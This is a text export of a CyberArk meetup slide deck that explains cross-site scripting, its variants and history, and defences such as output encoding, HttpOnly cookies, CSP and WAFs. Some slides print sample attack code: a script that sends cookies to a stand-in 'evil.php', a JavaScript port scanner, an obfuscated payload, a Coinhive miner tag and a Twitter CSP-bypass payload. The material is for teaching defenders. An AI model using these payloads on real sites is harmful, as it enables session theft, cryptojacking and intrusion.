Meetup presentation by CyberArk

1. XSS: From alert(1) to crypto mining malware
Borislav Chernilovsky
R&D Security Architect

2. What do you think?
2

3. Cross-Site Scripting (XSS)
 Malicious scripts are injected into otherwise benign and trusted web sites
 Web application uses input within the output it generates without validating or
encoding it
 Bypass the same-origin policy
 ~20 years old
 OWASP TOP 10 – 2017: A7
3

4. XSS - Example
4

5. XSS mechanics
 There are three types of XSS attack:
 Stored (AKA Persistent)
 Reflected (AKA Non-Persistent)
 DOM Based (AKA Client Side XSS)
5

6. Stored XSS
 User input is stored on the target server.
 A victim retrieves the stored data from the web application without that data being made safe to
render in the browser.
6

7. Reflected XSS
7
 The data is not stored permanently on the server.
 User input is immediately returned by a Web application in response.

8. DOM Based XSS
8
 The attack payload is executed as a result of modifying the DOM (Document Object Model) in the
victim’s browser.
 The page itself (the HTTP response) does not change.
 Example: <script> document.write("<b>Current URL</b> : " + document.location.href); </script>

9. Some history
9
1995
• Netscape
releases
JavaScript
1999
• First
XSS
attack
2005
• Samy
worm
2007
• #1 on
OWASP
Top 10
2014
• DDoS
XSS
2017
• XSS
crypto
miners

10. Not a thing of the past
10

11. Samy worm
 The fastest-spreading computer virus of all time
11

12. XSS – what can attackers do?
 Session hijacking
 Phishing
 Defacements
 Installation of Trojan horses
 Browser exploits
 Port scanning
 DDoS attacks
 Crypto miner$
12

13. Session hijacking
 Cookie based authentication
13
<SCRIPT type="text/javascript">
var adr = '../evil.php?cakemonster=' + escape(document.cookie);
</SCRIPT>

14. Phishing
 This technique is by far the most successful on the Internet today.
 Most methods use a link that leads to a spoofed website:
 Misspelled URLs
 Subdomains:
http://www.yourbank.malicious.com
 Covert redirect:
http://www.yourbank.example.com/?redirect=http://www.malicious.com
14

15. Phishing with XSS
 Why are XSS Phishing attacks particularly problematic?
 They direct the user to sign in at the service's own web page, where everything from the Web
address to the SSL certificate is valid.
15

16. Defacement
16

17. Port scanning
 Probe a server or host for open ports
 Often used by attackers to identify network services running on a host and exploit vulnerabilities
 Did you know that you can perform a port scan via JavaScript?
17

18. Port scanning via XSS
 The victim's workstation is used as a stepping stone to attack other systems.
 An XSS flaw can lead to a full network compromise.
18
window.onerror = handleError;
var newScript = document.createElement('script');
newScript.src = 'http://' + host + ':' + port;
function handleError(message, url, line)
{
if(message.match(/Script error|Error loading script/))
{
// Open!
}
}

19. Persistent XSS Enables Large-Scale DDoS Attack
 Sohu.com - 27th most visited website in
the world
 Attack: 20 million GET requests originating
from 22,000 browsers
 Sophisticated code that keeps track of the
attack for billing purposes
19

20. XSS crypto miners
 Any site with stored XSS is exposed to JavaScript crypto mining malware (like Monero ).
 “An XSS exploit in our KaTeX parser was used to embed
a JavaScript crypto miner in clients via an exploitative message.”

 100% CPU?
 Coinhive:
 Cryptocurrency mining service
 Identified by multiple security firms as the top malicious threat to Web users
 Keeps 30% of whatever amount of Monero is mined using its code, whether or not a Web site has given consent to
run it.
20
<script src="https://coinhive.com/lib/coinhive.min.js"></script>

21. Preventing Cross-Site Scripting
 Input validation
 Output encoding
 Security headers
 Code reviews
 Manual testing
 Static analysis
 Dynamic analysis
 Web Application Firewall (WAF)
21

22. Input validation
 Trust no one - all input must be validated:
 On server side!
 Client side validation should be used as a second line of defense.
 Validate pattern (e.g. credit card number), characters and length.
 Strategy:
1. Whitelisting: [A-Za-z0-9]*
2. Greylisting: .*[<>].*
3. Blacklisting: <script>alert(1)</script>
 Input validation is not the primary safeguards against Cross-Site Scripting.
22

23. JavaScript obfuscation
23

24. JavaScript obfuscation
24
[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]
+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(
![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[
]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[
])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[
][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])
[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![
]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])
[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()

25. Output encoding
 Convert untrusted input into a safe form
 Display data without executing as code in the browser
 Needs to occur within a specific context:
 HTML
 JavaScript
 URL
 CSS
 In addition to input validation
25

26. Output encoding – HTML context
 HTML encoding:
 When you want to put untrusted data directly into the HTML body
 HTML attribute encoding:
 This should not be used for complex attributes like href, src, style, or any of the event handlers like onmouseover.
26

27. Output encoding – JavaScript context
 JavaScript encoding:
 For dynamically generated JavaScript code
 It is extremely easy to switch into an execution context => use with caution!
 Some JS functions can never safely use untrusted data as input - EVEN IF JAVASCRIPT ESCAPED!
 Can we use to escape special characters?
 Escape the escape: “ => ”
 Escape all non-alphanumeric characters with xHH: “ => x22
27

28. Log everything!
28
2018-03-19 15:10:26,697 - login - INFO – User John logged out.
2018-03-19 15:10:26,697 - login - ERROR – User <script>alert(‘xss’);</script> entered incorrect password.

29. HTTPOnly cookie flag
 Preventing all XSS flaws in an application is hard => protect cookies from XSS attacks!
 HttpOnly cookies are inaccessible to JavaScript's Document.cookie API.
 An additional flag included in a Set-Cookie HTTP response header:
29
Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT; Secure; HttpOnly

30. Content Security Policy (CSP)
 “Defense in depth" technique against content injection attacks
 A declarative policy that controls resources the browser is allowed to load
 Requires browser support (supported by most)
 Content-Security-Policy HTTP header:
30
Content-Security-Policy: default-src 'none'; script-src 'self'; img-src 'self'; style-src 'self';
Allows images, scripts, and CSS from the same originNo other resources can load

31. Content Security Policy (CSP)
31
https://careers.twitter.com/en/jobs-search.html?location=1" onmouseover=”alert(1)&q=1&start=70&team=
https://analytics.twitter.com/tpm?tpm_cb= (the response Content-type = application/javascript)
https://careers.twitter.com/en/jobs-search.html?location=1"><script src=//analytics.twitter.com/tpm?tpm_cb=alert(document.domain)>//

32. X-XSS-Protection
 The browser detects reflected cross-site scripting attacks
 Provides protections for older web browsers that don't support CSP
 Syntax:
32
X-XSS-Protection: 0
X-XSS-Protection: 1
X-XSS-Protection: 1; mode=block
X-XSS-Protection: 1; report=<reporting-uri>

33. Framework security
 Address security while choosing a new technology/framework.
 Angular:
 All values are treated as untrusted by default.
 Interpolated content is always escaped:
 HTML properties - unsafe values are recognized and sanitized automatically:
33

34. Dynamic analysis
 Hack yourself!
 Works the best combined with some manual testing.
 Open source tools:
 OWASP ZAP
 Burp free
 Grabber
34

35. Example
35

36. Static analysis
 Examine the code without executing the program.
 Reveal hidden vulnerabilities that dynamic or manual testing/code review do not detect.
 High number of False Positives: for some tools, up to 85%!
 Do not try to reproduce every reported vulnerability!
36

37. Web Application Firewall (WAF)
 A reverse proxy that filters, monitors, and blocks HTTP traffic:
 Appliance
 Server plugin
 Cloud
 False Positives and False Negatives
 Customization and maintenance
 Great for zero-day attacks
 An additional security layer
37

38. Back to the first example
38

39. Summary
 XSS: malicious JavaScript code is injected to bypass the same-origin policy
 Numerous creative monetization techniques
 Use all tools available:
 Secure development and configuration
 Detection: static, dynamic, manual
 Complementary: WAF
39

40. 40
Questions?

41. 41